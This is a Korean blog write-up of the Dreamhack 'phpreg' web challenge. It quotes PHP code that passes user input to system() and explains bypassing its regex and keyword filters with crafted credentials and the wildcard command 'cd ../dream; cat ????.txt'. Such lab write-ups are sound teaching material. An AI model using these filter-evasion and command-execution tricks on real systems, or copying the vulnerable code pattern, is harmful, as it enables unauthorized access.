[Dreamhack] 드림핵 웹해킹 : phpreg

https://dreamhack.io/wargame/challenges/873

phpreg

 

 

문제설명

php로 작성된 페이지입니다.

알맞은 Nickname과 Password를 입력하면 Step 2로 넘어갈 수 있습니다.

Step 2에서 system() 함수를 이용하여 플래그를 획득하세요.

플래그는 ../dream/flag.txt에 위치합니다.

플래그의 형식은 DH{…} 입니다.

 

풀이

          // POST request
          if ($_SERVER["REQUEST_METHOD"] == "POST") {
            $input_name = $_POST["input1"] ? $_POST["input1"] : "";
            $input_pw = $_POST["input2"] ? $_POST["input2"] : "";

            // pw filtering
            if (preg_match("/[a-zA-Z]/", $input_pw)) {
              echo "alphabet in the pw :(";
            }
            else{
              $name = preg_replace("/nyang/i", "", $input_name);
              $pw = preg_replace("/\d*\@\d{2,3}(31)+[^0-8\"]\!/", "d4y0r50ng", $input_pw);
              
              if ($name === "dnyang0310" && $pw === "d4y0r50ng+1+13") {
                echo '<h4>Step 2 : Almost done...</h4><div class="door_box"><div class="door_black"></div><div class="door"><div class="door_cir"></div></div></div>';

                $cmd = $_POST["cmd"] ? $_POST["cmd"] : "";

                if ($cmd === "") {
                  echo '
                        <p><form method="post" action="/step2.php">
                            <input type="hidden" name="input1" value="'.$input_name.'">
                            <input type="hidden" name="input2" value="'.$input_pw.'">
                            <input type="text" placeholder="Command" name="cmd">
                            <input type="submit" value="제출"><br/><br/>
                        </form></p>
                  ';
                }
                // cmd filtering
                else if (preg_match("/flag/i", $cmd)) {
                  echo "<pre>Error!</pre>";
                }
                else{
                  echo "<pre>--Output--\n";
                  system($cmd);
                  echo "</pre>";
                }
              }
              else{
                echo "Wrong nickname or pw";
              }
            }
          }
          // GET request
          else{
            echo "Not GET request";
          }

index.php 는 별 내용이 없어서 step2.php 코드에서 php 부분만 가져왔다

 

Step 1

              if ($name === "dnyang0310" && $pw === "d4y0r50ng+1+13") {
                echo '<h4>Step 2 : Almost done...</h4><div class="door_box"><div class="door_black"></div><div class="door"><div class="door_cir"></div></div></div>';

아이디는 dnyang0310

비밀번호는 d4y0r50ng+1+13

이다

 

비밀번호 우회

            // pw filtering
            if (preg_match("/[a-zA-Z]/", $input_pw)) {
              echo "alphabet in the pw :(";
            }

 

근데 어이없게도 비밀번호에 알파벳이 있으면 안되게 처리해놨다

 

              $pw = preg_replace("/\d*\@\d{2,3}(31)+[^0-8\"]\!/", "d4y0r50ng", $input_pw);

 

그 위에 \d*\@\d{2,3}(31)+[^0-8\"]\! 라는 정규식을 만족하면 d4어쩌구로 인식하게 해놨으니 이용해보자

 

- \d* : 0개 이상 숫자

- \@ : 기호 @

- \d{2,3} : 숫자 2~3개

- (31)+ : 31이라는 숫자 1번 이상 반복

- [^0-8\"] : 문자 아무거나 (단 0~8 숫자 또는 기호 " 제외)

- \! : 기호 !

 

대충 0@12319! 로 정규식에 만족하는 문자열을 만들었고 

비번으로 0@12319!+1+13을 입력하자

 

아이디 우회

              $name = preg_replace("/nyang/i", "", $input_name);

nyang이라는 문자열이 있으면 없애버리게 만들어놨다

즉 dnyang0310 이라는 아이디를 입력해도 d0310 으로 들어가버린다

그럼 없애버린 후에 dnyang0310 이 되도록 dnnyangyang0310 으로 만들어주자

 

결국

아이디 : dnnyangyang0310

비밀번호 : 0@12319!+1+13

 

재밌다

 

Step2

이제 그냥 시스템 커맨드만 입력하면 된다

이렇게 커맨드창이랑 똑같다

문제에 플래그의 위치는 ../dream/flag.txt 

라고 했으므로 잘 찾아가서 flag.txt를 읽자

 

cd ../dream; cat flag.txt

 

아놔

 

뭔가 문제가 있다

코드를 한번 더 보자

                // cmd filtering
                else if (preg_match("/flag/i", $cmd)) {
                  echo "<pre>Error!</pre>";
                }
                else{
                  echo "<pre>--Output--\n";
                  system($cmd);
                  echo "</pre>";
                }

 

flag라는 문자가 들어가있으면 Error 가 뜨도록 처리해놨다

그럼 flag라는 단어를 쓰지 않는 명령어로 접근해보자

 

cd ../dream; cat ????.txt

 

cat 에 물음표를 넣으면 그 물음표에 아무거나 들어간 문자열로 알아서 찾아 출력해준다

 

아주 재밌다

초보 해커들에게 강추 !!